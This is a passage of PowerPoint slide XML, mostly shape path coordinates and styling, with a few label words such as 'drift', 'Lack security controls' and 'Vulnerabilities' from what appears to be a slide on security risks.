              <a:rPr dirty="0" sz="2200" spc="80">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>n  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="125">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>drift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69894" y="6930390"/>
            <a:ext cx="2030730" cy="69723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486409" marR="5080" indent="-474345">
              <a:lnSpc>
                <a:spcPct val="100499"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="80"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Lack</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-5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20">
                <a:solidFill>
                  <a:srgbClr val="44484E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45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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>security </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2200" spc="-57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44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>controls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00729" y="5156961"/>
            <a:ext cx="187198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45">
                <a:solidFill>
                  <a:srgbClr val="44484E"/>
                </a:solidFill>
                <a:latin typeface="Microsoft Sans Serif"/>
                <a:cs typeface="Microsoft Sans Serif"/>
              </a:rPr>
              <a:t>Vulnerabilities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354568" y="5154167"/>
            <a:ext cx="3127375" cy="3609340"/>
            <a:chOff x="8354568" y="5154167"/>
            <a:chExt cx="3127375" cy="3609340"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="10" name="object 10"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8354568" y="5609843"/>
              <a:ext cx="2696210" cy="3153410"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="2696209" h="3153409">
                  <a:moveTo>
                    <a:pt x="1666748" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="367791" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="318189" y="3304"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="270521" y="12924"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="225242" y="28416"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="182804" y="49337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="143661" y="75244"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108267" y="105695"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="77074" y="140247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50536" y="178458"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="29106" y="219884"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="13238" y="264083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="3385" y="310612"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="359028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="3153155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23749" y="3153155"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23749" y="2090546"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26892" y="2045013"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36048" y="2001326"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49639" y="1963165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23749" y="1963165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23749" y="359028"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="26892" y="313495"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="36048" y="269808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50805" y="228371"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70753" y="189587"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95478" y="153858"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124571" y="121586"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157619" y="93175"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194211" y="69026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233935" y="49543"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276381" y="35129"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321137" y="26184"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367791" y="23113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1666748" y="23113"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1666748" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="2696209" h="3153409">
                  <a:moveTo>
                    <a:pt x="2695955" y="1731517"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="367791" y="1731517"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="316340" y="1734979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="267111" y="1745064"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="220570" y="1761320"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="177181" y="1783296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="137407" y="1810540"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="101712" y="1842600"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70562" y="1879026"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="44419" y="1919365"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="23749" y="1963165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="49639" y="1963165"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="50805" y="1959889"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="70753" y="1921105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="95478" y="1885376"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="124571" y="1853104"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="157619" y="1824693"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="194211" y="1800544"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="233935" y="1781061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="276381" y="1766647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="321137" y="1757702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="367791" y="1754631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2695955" y="1754631"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2695955" y="1731517"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="313E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619232" y="6949439"/>
              <a:ext cx="862965" cy="841375"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="862965" h="841375">
                  <a:moveTo>
                    <a:pt x="431292" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="384288" y="2468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338752" y="9702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294948" y="21445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253138" y="37441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213585" y="57432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176552" y="81162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142301" y="108374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111095" y="138811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83198" y="172218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58871" y="208336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38378" y="246910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21982" y="287682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9945" y="330396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="374796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="420623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2530" y="466451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9945" y="510851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21982" y="553565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38378" y="594337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58871" y="632911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83198" y="669029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111095" y="702436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142301" y="732873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176552" y="760085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213585" y="783815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253138" y="803806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="294948" y="819802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="338752" y="831545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384288" y="838779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431292" y="841247"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478295" y="838779"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523831" y="831545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567635" y="819802"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609445" y="803806"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648998" y="783815"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686031" y="760085"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720282" y="732873"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751488" y="702436"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779385" y="669029"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803712" y="632911"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824205" y="594337"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840601" y="553565"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852638" y="510851"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860053" y="466451"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="862584" y="420623"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="860053" y="374796"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="852638" y="330396"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="840601" y="287682"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="824205" y="246910"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="803712" y="208336"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="779385" y="172218"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="751488" y="138811"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="720282" y="108374"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="686031" y="81162"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="648998" y="57432"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="609445" y="37441"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="567635" y="21445"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="523831" y="9702"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="478295" y="2468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="431292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511284" y="5154167"/>
              <a:ext cx="864235" cy="844550"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="864234" h="844550">
                  <a:moveTo>
                    <a:pt x="432054" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="384974" y="2476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339363" y="9735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295485" y="21518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253603" y="37569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213980" y="57629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176881" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142568" y="108750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111305" y="139295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83356" y="172821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58984" y="209070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38452" y="247784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22024" y="288706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9964" y="331579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="376145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="422148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2535" y="468150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9964" y="512716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="22024" y="555589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="38452" y="596511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="58984" y="635225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="83356" y="671474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="111305" y="705000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="142568" y="735545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="176881" y="762853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="213980" y="786666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="253603" y="806726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="295485" y="822777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="339363" y="834560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="384974" y="841819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432054" y="844296"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479133" y="841819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524744" y="834560"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568622" y="822777"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610504" y="806726"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650127" y="786666"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687226" y="762853"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721539" y="735545"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752802" y="705000"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780751" y="671474"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="805123" y="635225"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825655" y="596511"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842083" y="555589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854143" y="512716"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861572" y="468150"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="864108" y="422148"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="861572" y="376145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="854143" y="331579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="842083" y="288706"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="825655" y="247784"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="805123" y="209070"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="780751" y="172821"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="752802" y="139295"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="721539" y="108750"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="687226" y="81442"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="650127" y="57629"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="610504" y="37569"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="568622" y="21518"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="524744" y="9735"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="479133" y="2476"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="432054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92540" y="5544311"/>
              <a:ext cx="167639" cy="16459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04248" y="7266432"/>
              <a:ext cx="166116" cy="164592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7694676" y="3514344"/>
            <a:ext cx="948055" cy="5248910"/>
            <a:chOff x="7694676" y="3514344"/>
            <a:chExt cx="948055" cy="5248910"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="16" name="object 16"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="8135112" y="4160520"/>
              <a:ext cx="26034" cy="4602480"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="26034" h="4602480">
                  <a:moveTo>
                    <a:pt x="25907" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="0" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="4602480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25907" y="4602480"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="25907" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="313E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694676" y="3514344"/>
              <a:ext cx="948055" cy="928369"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="948054" h="928370">
                  <a:moveTo>
                    <a:pt x="473964" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="425506" y="2395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378448" y="9428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333027" y="20863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289482" y="36468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248051" y="56010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208973" y="79255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172485" y="105970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138826" y="135921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108235" y="168876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80949" y="204601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57208" y="242863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37248" y="283428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21309" y="326063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9629" y="370535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2447" y="416611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="464057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="2447" y="511504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="9629" y="557580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21309" y="602052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="37248" y="644687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="57208" y="685252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="80949" y="723514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108235" y="759239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="138826" y="792194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="172485" y="822145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="208973" y="848860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="248051" y="872105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="289482" y="891647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="333027" y="907252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="378448" y="918687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="425506" y="925720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473964" y="928115"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522421" y="925720"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569479" y="918687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614900" y="907252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658445" y="891647"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699876" y="872105"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738954" y="848860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775442" y="822145"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809101" y="792194"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839692" y="759239"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866978" y="723514"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890719" y="685252"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910679" y="644687"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926618" y="602052"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938298" y="557580"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945480" y="511504"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="947927" y="464057"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="945480" y="416611"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="938298" y="370535"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="926618" y="326063"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="910679" y="283428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="890719" y="242863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="866978" y="204601"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="839692" y="168876"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="809101" y="135921"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="775442" y="105970"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="738954" y="79255"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="699876" y="56010"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="658445" y="36468"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="614900" y="20863"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="569479" y="9428"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="522421" y="2395"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="473964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65008" y="4885944"/>
              <a:ext cx="166116" cy="164591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5506211" y="4981955"/>
            <a:ext cx="2458720" cy="3781425"/>
            <a:chOff x="5506211" y="4981955"/>
            <a:chExt cx="2458720" cy="3781425"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="20" name="object 20"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="5996940" y="5387339"/>
              <a:ext cx="1967864" cy="3375660"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1967865" h="3375659">
                  <a:moveTo>
                    <a:pt x="1751076" y="2181352"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1747685" y="2132977"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1737855" y="2086483"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1722005" y="2042325"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1700606" y="2000948"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1674101" y="1962772"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1642948" y="1928266"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1607591" y="1897849"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1568488" y="1871980"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1526095" y="1851088"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1480858" y="1835619"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1433233" y="1826006"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1383665" y="1822704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1822704"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1845818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1383665" y="1845818"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1430248" y="1848891"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1474952" y="1857819"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1517345" y="1872208"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1557032" y="1891665"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1593583" y="1915782"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1626590" y="1944154"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1655660" y="1976386"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1680362" y="2012073"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1700288" y="2050808"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1715033" y="2092210"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1724177" y="2135860"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727327" y="2181352"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1727327" y="3375660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751076" y="3375660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1751076" y="2181352"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
                <a:path w="1967865" h="3375659">
                  <a:moveTo>
                    <a:pt x="1967484" y="359029"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="1964156" y="310616"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1954479" y="264083"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1938870" y="219887"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1917763" y="178460"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1891601" y="140258"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1860816" y="105702"/>
                  </a:lnTo>
